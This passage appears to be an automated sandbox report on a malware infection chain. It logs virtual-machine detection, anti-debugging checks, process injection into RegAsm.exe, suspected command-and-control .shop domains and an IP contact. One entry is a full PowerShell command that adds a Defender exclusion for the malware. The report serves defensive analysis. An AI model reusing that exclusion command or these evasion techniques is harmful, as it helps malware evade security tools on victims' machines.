Source: RageMP131.exe, 0000002E.00000003.2194989877.0000000001011000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001B.00000002.3354975509.0000000008120000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
Source: 1CMweaqlKp.exe, 00000000.00000003.1640238021.000000000113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: amert.exe, 00000007.00000003.1866578225.00000000011B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c73
Source: netsh.exe, 00000016.00000003.1948196297.00000284B17C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
Source: MPGPH131.exe, 0000001B.00000002.3350736971.00000000013ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 0000001B.00000003.3207696960.0000000008157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: F9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: MPGPH131.exe, 0000001B.00000002.3350736971.0000000001466000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ABA40470mm
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: MPGPH131.exe, 0000001B.00000003.3248220823.0000000007CD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}jp,w.jp,x.jp,y.jp,z.jp,a.za,b.za,c.za,d.za,e.za,f.za,g.za,h.za,i.za,j.za,k.za,l.za,m.za,n.za,o.za,p.za,q.z
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: MPGPH131.exe, 0000001C.00000003.2505158116.00000000012C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91e
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}es=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsee
Source: RageMP131.exe, 0000002E.00000002.2637513543.000000000100E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: RegAsm.exe, 0000002F.00000002.2105971476.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: d361f35322.exe, 00000024.00000002.3081226044.0000000001440000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ABA40470
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: d361f35322.exe, 00000024.00000003.2762447424.0000000001447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JwZo/8MwiwHqIvXEAOVpRY7WnVBhrODe/dgRQYX3uczos12TJGMgUcbRf8jrvikd/VczY83oKOZAMzqKgTejI6EDzeg4bDERNuftnqULxoXXPfG6v9krfDbdf0XoQLjCXaLpea2NXecnZXJn9gK/7u4bACHwMWEsF/+YMF5I4GPCRFLE5FKoUgv0RsC+xv1D14mzjXDWhOP4HkVDCCuw0TOg7ZoSe+IcDxF44hzPxp84JxATeOKcTI44gBz6tsBxz8kV3Mr9ySGQd6AQBIufA8mBljGr2c5LvboJrUlkjspoX0E2zmf8Wi7uCKu66bwVcqk7OT/SRzGzI8Fb4KGABhhMsrgTyXTudeKduS4BCrZLqtu5HCGjWWcBWT2zygyOzYKzWCB4Jda5PJQz8Bg1lJo/Rg0HDTxGjUQV41HdqVdyXOqVkn1e8dO8sqbbOolfg2AmVM0VryhWWcGcYcoKpvYpKwQ0TFnhqGI8amAyr3+9rX+lgDhnc2WN9VR7E/PZPX17mOSQ+bU93mgEU2hPoeE4CGTPhOwddnXof5xFfl5co7tcTE3iOHouxpfJr06qt2mtqWrYr3D+gjeU0Eqvi09rsYc3LTTeHa+hFdn7HjKUcFxD7a0pHdlY9wZ6cvN0VG0ObsC25C2riwgNYAv7HbHjH6+S+pQT0NqEUKNKMPsnM9F0i4ZT0ONhHH4K0iLOkQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n8
Source: amert.exe, amert.exe, 00000007.00000002.1869091189.00000000007FE000.00000040.00000001.01000000.0000000B.sdmp, d361f35322.exe, d361f35322.exe, 00000009.00000002.3072417756.0000000000B00000.00000040.00000001.01000000.0000000C.sdmp, explorha.exe, 0000000B.00000002.1945729188.0000000000B1E000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 0000001B.00000002.3349608067.0000000000A20000.00000040.00000001.01000000.00000012.sdmp, d361f35322.exe, 00000024.00000002.3073507178.0000000000B00000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000002.2634385282.0000000000BB0000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: RegAsm.exe, 0000002F.00000002.2105971476.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareO#
Source: RageMP131.exe, 0000002E.00000003.2194989877.0000000001009000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}yr
Source: explorta.exe, 00000005.00000002.1735792403.0000000001288000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: d361f35322.exe, 00000024.00000002.3088709368.0000000007C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}es=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsdd
Source: d361f35322.exe, 00000024.00000003.2819365667.000000000144A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n8
Source: d361f35322.exe, 00000009.00000003.1936676269.000000000142F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: d361f35322.exe, 00000024.00000003.2819365667.000000000144A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: d361f35322.exe, 00000009.00000003.2912737740.0000000007DE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 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
Source: d361f35322.exe, 00000024.00000002.3079225585.00000000013F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: amert.exe, 00000007.00000002.1869091189.00000000007FE000.00000040.00000001.01000000.0000000B.sdmp, d361f35322.exe, 00000009.00000002.3072417756.0000000000B00000.00000040.00000001.01000000.0000000C.sdmp, explorha.exe, 0000000B.00000002.1945729188.0000000000B1E000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 0000001B.00000002.3349608067.0000000000A20000.00000040.00000001.01000000.00000012.sdmp, d361f35322.exe, 00000024.00000002.3073507178.0000000000B00000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000002.2634385282.0000000000BB0000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: d361f35322.exe, 00000009.00000002.3073575028.00000000013E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ABA40470}
Source: RageMP131.exe, 0000002E.00000002.2637513543.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe System information queried: ModuleInformation
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_052D03D1 Start: 052D06B7 End: 052D0461 9_2_052D03D1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Code function: 7_2_05010B4F rdtsc 7_2_05010B4F
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A4130 mov eax, dword ptr fs:[00000030h] 9_2_008A4130
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00871A60 mov eax, dword ptr fs:[00000030h] 9_2_00871A60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: swiiiii[1].exe.10.dr, Angelo.cs Reference to suspicious API methods: Program.GetProcAddress(Program.GetModuleHandle(aScsrhgtr), "FreeConsole")
Source: swiiiii[1].exe.10.dr, Angelo.cs Reference to suspicious API methods: Program.GetProcAddress(Program.GetModuleHandle(aScsrhgtr), "VirtualProtectEx")
Source: file300un[1].exe.10.dr, -.cs Reference to suspicious API methods: _FDDD_FDFD_FBD0_066C_FDD3_0611_FDFC_FDD9.LoadLibrary(_FDD4_FD3E_06D8(_FD42_066A_061F_FBB7_060E_066D._0650_FBBC_FDE8))
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Thread created: unknown EIP: 34419A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: pillowbrocccolipe.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: communicationgenerwo.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: diskretainvigorousiw.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: affordcharmcropwo.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: dismissalcylinderhostw.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: enthusiasimtitleow.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: worryfillvolcawoi.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: cleartotalfisherwo.shop
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Section loaded: NULL target: unknown protection: read write
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Section loaded: NULL target: unknown protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 629008
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41B000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 636000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BF3008
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 404000
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 406000
